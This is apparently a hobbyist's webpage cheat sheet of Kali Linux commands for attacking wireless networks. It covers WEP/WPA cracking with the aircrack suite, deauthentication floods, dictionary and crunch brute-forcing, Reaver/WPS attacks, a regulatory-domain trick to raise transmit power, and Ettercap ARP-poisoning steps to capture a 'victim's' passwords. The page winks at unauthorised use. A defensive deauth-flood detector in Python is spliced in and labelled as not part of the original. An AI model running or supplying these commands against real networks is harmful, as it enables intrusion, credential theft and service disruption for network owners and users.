Wireless Security Analyzing Commands -
these terminal commands are to 'ahem' test the security of your network
Kali Linux
KDE Edition
  Terminal Commands In SU Mode  
  Cracking WEP  
 
    ****** SCANNING & COLLECTING ******  
  airodump-ng -c 06 --ivs -w dump wlan0  
  ---------- { or to scan all channels  
  airodump-ng --ivs -w dump wlan0  
     
    ****** FAKE AUTHENTICATION *******  
  aireplay-ng -1 0 -e NAME -a TT:AA:RR:GG:EE:TT -h FF:AA:KK:EE:MM:CC wlan0  
  ---------- { or for tricky routers  
  aireplay-ng -1 600 -o 1 -q 10 -e NAME -a TT:AA:RR:GG:EE:TT -h FF:AA:KK:EE:MM:CC wlan0  
  ( 600 = reauth every 600 seconds, -o 1 = send only 1 set of packets at a time, -q 10 = send keep-alive packets every 10 seconds )  
     
    ****** INJECTING *******  
  aireplay-ng --arpreplay -b TT:AA:RR:GG:EE:TT -h UU:SS:EE:II:NN:GG wlan0  
     
   ****** RE-INJECTING A RECEIVED PACKET *******  
  aireplay-ng -2 -p 0841 -c MM:YY:MM:AA:CC:AA -b TT:AA:RR:GG:EE:TT -h MM:YY:MM:AA:CC:AA wlan0  
     
    ****** DE-AUTHENTICATION *******  
  aireplay-ng -0 1 -a TT:AA:RR:GG:EE:TT -c UU:SS:EE:II:NN:GG wlan0  
     
    ****** CRACKING *******  
  aircrack-ng -b TT:AA:RR:GG:EE:TT dump-01.ivs  
  ---------- { or choosing between 64bit & 128bit Wep  
  aircrack-ng -n 64 dump-01.ivs  
     
  Cracking WPA  
     
   ****** SCANNING & COLLECTING ******  
  ( -a = filter associated clients only, -c = channel, -w = write )  
  airodump-ng -a -c 6 -w psk wlan0  
  ---------- { or to scan all channels  
  airodump-ng -a -w psk wlan0  
  ---------- { or to scan only a specific client  
  airodump-ng -a -c 6 --bssid TT:AA:RR:GG:EE:TT -w psk wlan0  
  ---------- { or to scan & collect only the .cap file  
  airodump-ng -a --output-format pcap -w psk wlan0  
  ---------- { combined to scan a specific client on a specific channel, collecting the cap file  
  airodump-ng -a -c 9 --output-format pcap --bssid 00:18:39:A2:65:26 -w psk wlan0  
  ( --note-- pressing the TAB button puts it in select mode; scrolling down the list of APs shows the associated clients )  
  ( --note-- pressing the S button changes the list sort order, e.g. list by AP, Signal, SSID, Encryption etc. )  
     
    ****** DE-AUTHENTICATION *******  
  aireplay-ng -0 1 -a TT:AA:RR:GG:EE:TT -c UU:SS:EE:II:NN:GG wlan0  
  ( 1 is the number of deauths to send, 0 means send them continuously )  
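  A defender-side counterpart, added here and not part of the original page: a small Python detector that parses raw 802.11 management frames and flags any BSSID whose deauth/disassoc frames reach a threshold inside a sliding time window, which is the on-air signature of the continuous -0 run above. The frames, MAC addresses, timestamps, window and threshold are all constructed assumptions for the example.

```python
import struct
from collections import defaultdict

# Frame-control byte 0 values for the 802.11 management subtypes of interest
BEACON, DISASSOC, DEAUTH = 0x80, 0xA0, 0xC0

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_mgmt(raw):
    """Parse the 24-byte 802.11 MAC header of a management frame (no radiotap header).
    Returns None for non-management frames or truncated input."""
    if len(raw) < 24 or (raw[0] >> 2) & 0x3 != 0:   # type bits must be 00 (management)
        return None
    frame = {"subtype": raw[0] & 0xFC, "dst": mac_str(raw[4:10]),
             "src": mac_str(raw[10:16]), "bssid": mac_str(raw[16:22]), "reason": None}
    if frame["subtype"] in (DEAUTH, DISASSOC) and len(raw) >= 26:
        frame["reason"] = struct.unpack_from("<H", raw, 24)[0]   # little-endian reason code
    return frame

def detect_deauth_flood(frames, window=1.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes) as a monitor-mode sniffer yields.
    Returns {bssid: peak_count} for every BSSID whose deauth/disassoc count within any sliding
    `window` seconds reaches `threshold` (one deauth is normal roaming; a burst is not)."""
    times_by_bssid = defaultdict(list)
    for ts, raw in frames:
        f = parse_mgmt(raw)
        if f and f["subtype"] in (DEAUTH, DISASSOC):
            times_by_bssid[f["bssid"]].append(ts)
    alerts = {}
    for bssid, times in times_by_bssid.items():
        times.sort()
        start = peak = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts

# --- constructed sample capture (hypothetical addresses, not from a real network) ---
def build_mgmt(subtype, dst, src, bssid, body=b""):
    """Assemble a minimal management frame: FC, duration, addr1-3, sequence control, body."""
    return bytes([subtype, 0x00]) + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body

AP, OTHER_AP, BCAST = bytes.fromhex("020000000001"), bytes.fromhex("020000000002"), b"\xff" * 6
REASON_7 = struct.pack("<H", 7)   # reason 7: class 3 frame received from nonassociated STA
SAMPLE_FRAMES = [(0.00, build_mgmt(BEACON, BCAST, AP, AP)),
                 (0.30, build_mgmt(DEAUTH, BCAST, OTHER_AP, OTHER_AP, REASON_7))]  # one benign deauth
# eight broadcast deauths from AP within half a second: the pattern a continuous -0 run produces
SAMPLE_FRAMES += [(0.50 + i * 0.06, build_mgmt(DEAUTH, BCAST, AP, AP, REASON_7)) for i in range(8)]

if __name__ == "__main__":
    print(detect_deauth_flood(SAMPLE_FRAMES))   # {'02:00:00:00:00:01': 8}
```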
     
    ****** CRACKING *******  
  aircrack-ng -w Passwords/passwords.lst psk*.cap  
  ---------- { or to crack using Kismet files  
  aircrack-ng -w Passwords/passwords.lst Kismet*.dump  
     
  Misc Commands  
     
    ****** CHANGING MAC ADDRESS OF CARD *******  
  ifconfig wlan0 hw ether NN:EE:WW:MM:AA:CC  
    ****** STOPPING & STARTING THE WIFI CARD IN MONITOR MODE *******  
  airmon-ng stop wlan0  
  airmon-ng start wlan0  
    ****** INCREASING POWER ON WIFI CARD *******  
  iw reg set BO  
  ( sets the regulatory domain to Bolivia (BO); the transmit power the driver allows follows the regulatory domain )  
    ****** CHECKING POWER ON WIFI CARD *******  
  iw list  
    ****** EXTRACTING HANDSHAKES FROM LARGE CAP FILES *******  
  tshark -r 'psk-01.cap' -R "eapol || wlan.fc.type_subtype == 0x08" -w 'new.cap'  
  ( This extracts all handshakes and beacon packets from the cap file & creates a new file )  
  tshark -r 'psk-01.cap' -R "eapol || wlan.bssid == 00:14:6C:7E:40:80" -w 'new.cap'  
  ( This extracts the handshake and beacon packets of a specified access point (BSSID) from the cap file & creates a new file )  
  ( --note-- newer tshark versions need -2 before -R for a two-pass read filter, or -Y for a display filter )  
     
  Other Cracking Commands  
   ♦ Using Aircrack  
     
  aircrack-ng -w '/media/Data/Dictionaries/Ultimate.txt' psk*.cap  
  aircrack-ng -w '/media/Data/Dictionaries/Ultimate.txt' Kismet*.dump  
  aircrack-ng -w '/media/Data/Dictionaries/Numbers.txt' psk*.cap  
  aircrack-ng -w '/media/Data/Dictionaries/Numbers.txt' Kismet*.dump  
     
   ♦ Using Pyrit  
     
  pyrit -r "/home/macmon/psk*.cap" -i "/media/Data/Dictionaries/Ultimate.txt" attack_passthrough  
  pyrit -r "/home/macmon/psk*.cap" -i "/media/Data/Dictionaries/Numbers.txt" attack_passthrough  
     
   ♦ Using Crunch To Generate Passwords  
     
  crunch 10 10 0123456789ABCDEF | pyrit -r "/home/macmon/psk-01.cap" -e "NAME" -i - attack_passthrough  
  ( This uses 10 digit hex on a given client taken from the cap file )  
  crunch 8 8 0123456789 | pyrit -r "/home/macmon/psk-01.cap" -e "NAME" -i - attack_passthrough  
  ( This uses 8 digit numbers on a given client taken from the cap file )  
  crunch 10 10 1234567890ABCDEF | aircrack-ng -b MM:AA:CC:MM:AA:CC -w - /home/macmon/psk-01.cap  
  ( This uses 10 digit hex on a given client taken from the cap file )  
  crunch 8 8 1234567890 | aircrack-ng -b MM:AA:CC:MM:AA:CC -w - /home/macmon/psk-01.cap  
  ( This uses 8 digit numbers on a given client taken from the cap file )  
     
   ♦ Using Cowpatty With Rainbow Tables  
     
  cowpatty -s 2WIRE031 -d media/Extra/rainbow-tables/wpa_tables/xaa-0/2WIRE031 -r psk*cap  
  ( 2WIRE031 is an example SSID, using a rainbow table file stored on the PC; change accordingly )  
     
   ♦ Other Pyrit Commands  
     
  pyrit list_cores  
  ---------- { lists available cores for cracking  
  pyrit benchmark  
  ---------- { tests pyrit for cracking speed  
  pyrit -r "/home/macmon/psk-01.cap"  
  ---------- { examines the cap file for a valid handshake  
     
  Ettercap (man-in-the-middle)  
   ♦ Using Ettercap  
     
  In the Sniff menu select "unified sniffing" - select the network interface, e.g. wlan0  
  In the Hosts menu select "scan for hosts" - this finds anyone logged onto the network you are targeting  
  If you don't want to ARP poison and just want to do a discreet scan  
  of the router and clients, just click "start sniffing" in the Start menu  
  In the Hosts menu select "host list" - this shows the computers logged onto the target network  
  Click once on the gateway IP, e.g. 192.168.1.1, so it is highlighted, then click "add to target 1"  
  Click once on the IP address of the victim (client), e.g. 192.168.1.102, so it is highlighted, then click "add to target 2"  
  In the View menu select "statistics"  
  In the Targets menu select "current targets"  
  In the Mitm menu select "Arp Poisoning" and in the box tick "sniff remote connections"  
  In the Start menu select "stop sniffing", then select "start sniffing"  
  Watch the bottom window for passwords and web addresses from the client (victim)  
  - you can also log the info easily by selecting Logging - "log user messages"
 
     
  WPS Exploit (cracking WPA using Reaver and WPSCrack - Terminal)  
   ****** PUT THE WIFI ADAPTOR IN MONITOR MODE*******  
  airmon-ng start wlan0  
     
  Scan for an access point to attack and copy its MAC (TARGET) address for later ...  
     
   ♦ Wash (a terminal utility that is part of the Reaver installation)  
  Wash is a utility for identifying WPS-enabled access points. It can survey from a live interface:  
     
  wash -i mon0  
      
  By default, wash performs a passive survey. However, wash can be instructed to send probe requests  
  to each AP in order to obtain more information about the AP:  
      
  wash -i mon0 --scan  
  To fix a screen full of these - Found packet with bad FCS, skipping...  
  wash -i mon0 -C -s  
  Wash will only show access points that support WPS  
     
   ♦ Reaver - ( terminal version, not GUI )  
     
    ****** PUT THE WIFI ADAPTOR IN MONITOR MODE*******  
  airmon-ng start wlan0  
  ( This puts the card in monitor mode; take note of the mon number it allocates, i.e. mon0, mon1, etc. )  
  ****** ATTACK THE VICTIM *******  
  reaver -i mon0 -b TT:AA:RR:GG:EE:TT -vv  
  Wait - this could take some hours.  
     
  The GUI version does pretty much the same as the terminal version.  
     
   ♦ WPSCrack  
     
    ****** PUT THE WIFI ADAPTOR IN MONITOR MODE*******  
  airmon-ng start wlan0  
  ( This puts the card in monitor mode; take note of the mon number it allocates, i.e. mon0, mon1, etc. )  
     
   ****** ATTACK THE VICTIM *******  
  cd to the directory where WPSCrack is located  
  ./wpscrack.py --iface mon0 --client MM:YY:MM:AA:CC:AA --bssid TT:AA:RR:GG:EE:TT --ssid testap -v  
  If WPSCrack is in the /usr/bin directory there is no need to cd to its directory; use the command below instead  
  wpscrack.py --iface mon0 --client MM:YY:MM:AA:CC:AA --bssid TT:AA:RR:GG:EE:TT --ssid testap -v  
  Wait - this could take some hours.  
     
     
 
________________________________________________________
 
     
                              Webpage designed by Bucky © M6VUK